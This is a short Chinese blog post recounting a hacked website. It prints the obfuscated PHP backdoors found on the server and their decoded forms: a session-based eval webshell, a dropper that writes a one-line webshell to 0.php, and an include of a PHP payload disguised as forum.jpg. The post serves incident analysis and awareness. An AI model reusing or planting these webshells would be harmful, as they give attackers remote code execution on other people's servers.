网站被入侵,并挂马

分类:安全,工作记 | 作者:凹凸曼 | 发表于2015/07/17

安全问题,大多数时候我们并不会太注意,只有等到出现问题,才会去补救,这也是目前大多数公司领导所忽略的问题!

刚刚接手,已早被人拿下来webshell权限来,还木有摸热就把站点删除了,挺悲剧的。。。

入侵点之一:

Screenshot-8

后门程序一:eval(gzinflate(str_rot13(base64_decode(‘s7ezsQ/wCODlKkEtLs7Mz4svLlYsKtHQtOblylnTyCwuQS3RQ4kP8A8OiUlCzkJWSI/V1Kzm5UWJD2kNDvb094tJL8lVaAZYKNgqlBRy5qIrB5pHi28YpkGwkalyiTkaVonFqXMm8SmpIM041E8MtAc6HAA=’))));

反解:

?><?PHP
session_start();
if(isset($_POST['code'])){
$_SESSION['theCode'] = trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}
?><?

后门程序二:@file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQCRfR0VUW25dKCRfUE9TVFt4XSk7Pz4g’));

反解:@file_put_contents(‘0.php’,”<?php @$_GET[n]($_POST[x]);?>“);

 

恶意程序:@INCLUDE_ONCE(PACK(‘H*’,’666f72756d2e6a7067′));

反解:@INCLUDE_ONCE(PACK(‘H*’,’forum.jpg’));

forum.jpg是php程序,执行一些恶意的内容

 

本文出自 “凹凸曼” 博客,请务必保留此出处 http://www.apoyl.com/?p=1931

Tag:

日志信息 »

该日志于2015-07-17 17:00由 凹凸曼 发表在安全, 工作记分类下, 你可以发表评论。除了可以将这个日志以保留源地址及作者的情况下引用到你的网站或博客,还可以通过RSS 2.0订阅这个日志的所有评论。

目前盖楼 (0)层:

发表评论 »

« »